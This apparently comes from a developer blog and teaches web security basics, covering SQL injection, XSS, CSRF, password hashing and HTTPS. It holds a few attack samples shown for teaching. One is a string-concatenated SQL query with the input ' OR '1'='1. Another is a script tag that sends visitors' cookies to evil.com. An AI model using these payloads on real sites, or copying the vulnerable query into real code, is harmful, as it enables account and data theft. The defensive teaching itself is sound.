Web Security Basics Every Developer Must Know in 2025

By /

A friend of mine launched a SaaS product last year. Beautiful UI, great features, paying customers within the first month. Then someone found an SQL injection vulnerability in the login form. They lost their entire user database. The business never recovered.

Security isn’t optional. It’s not something you “add later.” It needs to be part of how you think about code from day one.

SQL Injection: Still the #1 Threat

If you’re building queries by concatenating strings, you’re vulnerable. Period.

# DANGEROUS - Never do this
query = "SELECT * FROM users WHERE email = '" + user_input + "'"

# SAFE - Use parameterized queries
cursor.execute("SELECT * FROM users WHERE email = %s", (user_input,))

With the dangerous version, someone could input ' OR '1'='1 and get access to every user record. Parameterized queries treat user input as data, never as SQL code.

Cross-Site Scripting (XSS)

XSS happens when you display user input without sanitizing it. If someone puts <script>document.location='https://evil.com/steal?cookie='+document.cookie</script> in a comment field and you render it as-is, every visitor runs that script.

Prevention:

  • Always escape HTML output. Use your framework’s built-in escaping
  • Set Content-Security-Policy headers
  • Use httpOnly flag on cookies so JavaScript can’t access them

Cross-Site Request Forgery (CSRF)

Imagine a user is logged into their bank. They visit a malicious site that has a hidden form that submits a transfer request to the bank. Because the user’s browser has valid session cookies, the bank processes it.

Prevention:

  • Use CSRF tokens in all state-changing forms
  • Check the Origin and Referer headers
  • Use SameSite cookie attribute

Authentication Best Practices

  • Never store passwords in plain text. Use bcrypt or Argon2
  • Implement rate limiting on login endpoints
  • Use multi-factor authentication for sensitive operations
  • Set proper session timeouts
  • Invalidate sessions on password change
# Python example with bcrypt
import bcrypt

# Hashing a password
hashed = bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt())

# Verifying a password
if bcrypt.checkpw(submitted_password.encode('utf-8'), stored_hash):
    print("Login successful")

HTTPS Everywhere

There’s no excuse in 2025 for not using HTTPS. Let’s Encrypt is free. Without HTTPS, anyone on the same network can see everything your users send and receive – passwords, personal data, everything.

The Security Mindset

The most important security practice isn’t any specific technique – it’s the mindset. Every time you handle user input, ask yourself: “What’s the worst thing someone could put in here?” That single question will prevent most vulnerabilities.

Security isn’t about being paranoid. It’s about being responsible. Your users trust you with their data. Don’t let them down.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top